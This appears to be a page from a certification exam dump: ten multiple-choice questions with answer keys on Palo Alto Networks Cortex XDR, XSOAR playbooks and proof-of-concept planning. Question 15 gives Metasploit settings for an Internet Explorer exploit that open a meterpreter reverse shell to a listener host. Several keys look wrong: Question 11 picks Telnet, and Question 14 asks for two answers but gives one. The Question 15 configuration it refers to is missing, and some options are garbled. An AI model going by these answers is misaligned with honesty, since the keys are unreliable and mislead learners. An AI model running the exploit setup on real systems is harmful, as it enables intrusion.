Palo Alto Networks PSE-Cortex Professional PSE-CORTEX Questions & Answers

• Question 11:

  Cortex XDR can schedule recurring scans of endpoints for malware. Identify two methods for initiating an on-demand malware scan (Choose two )

  A. Response > Action Center

  B. the local console

  C. Telnet

  D. Endpoint > Endpoint Management

  Correct Answer: AC

• Question 12:

  How many use cases should a POC success criteria document include?

  A. only 1

  B. 3 or more

  C. no more than 5

  D. no more than 2

  Correct Answer: D

• Question 13:

  The certificate used for decryption was installed as a trusted root CA certificate to ensure communication between the Cortex XDR Agent and Cortex XDR Management Console What action needs to be taken if the administrator determines the Cortex XDR Agents are not communicating with the Cortex XDR Management Console?

  A. add paloaltonetworks com to the SSL Decryption Exclusion list

  B. enable SSL decryption

  C. disable SSL decryption

  D. reinstall the root CA certificate

  Correct Answer: D

• Question 14:

  The images show two versions of the same automation script and the results they produce when executed in Demisto. What are two possible causes of the exception thrown in the second Image? (Choose two.)

  A. The modified scnpt was run in the wrong Docker image

  B. The modified script required a different parameter to run successfully.

  C. The dictionary was defined incorrectly in the second script.

  D. The modified script attempted to access a dictionary key that did not exist in the dictionary named "data"

  Correct Answer: A

• Question 15:

  A test for a Microsoft exploit has been planned. After some research Internet Explorer 11 CVE-2016-0189 has been selected and a module in Metasploit has been identified (exploit/windows/browser/ms16_051_vbscript)

  The description and current configuration of the exploit are as follows;

  

  What is the remaining configuration?

  A. set PAYLOAD windows/x64/meterpreter/reverse_tcp set SSLCert survey set LHOST 10.0.0.10

  set LPORT 8080

  B. set PAYLOAD windows/x64/powershell_bind_tcp set SRVHOST 10.0.0.10 set SRVHOST 443 set URIPATH survey

  C. set PAYLOAD windows/x64/meterpreter/reverse_Tcp set SRVHOST 10.0.0.10 set SRVHOST 443 set URIPATH survey

  D. set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 10.0.0.10 set LPORT 443 set URIPATH survey

  Correct Answer: D

• Question 16:

  In Cortex XDR Prevent, which three matching criteria can be used to dynamically group endpoints? (Choose three.)

  A. Domain/workgroup membership

  B. quarantine status

  C. hostname

  D. OS

  E. attack threat intelligence tag

  Correct Answer: ACD

• Question 17:

  An EDR project was initiated by a CISO. Which resource will likely have the most heavy influence on the project?

  A. desktop engineer

  B. SOC manager

  C. SOC analyst IT

  D. operations manager

  Correct Answer: B

• Question 18:

  How does an "inline" auto-extract task affect playbook execution?

  A. Doesn't wait until the indicators are enriched and continues executing the next step

  B. Doesn't wait until the indicators are enriched but populate context data before executing the next

  C. step. Wait until the indicators are enriched but doesn't populate context data before executing the next step.

  D. Wait until the indicators are enriched and populate context data before executing the next step.

  Correct Answer: D

• Question 19:

  In the DBotScore context field, which context key would differentiate between multiple entries for the same indicator in a multi-TIP environment?

  A. Vendor

  B. Type

  C. Using

  D. Brand

  Correct Answer: A

• Question 20:

  Which step is required to prepare the VDI Golden Image?

  A. Review any PE files that WildFire determined to be malicious

  B. Ensure the latest content updates are installed

  C. Run the VDI conversion tool

  D. Set the memory dumps to manual setting

  Correct Answer: D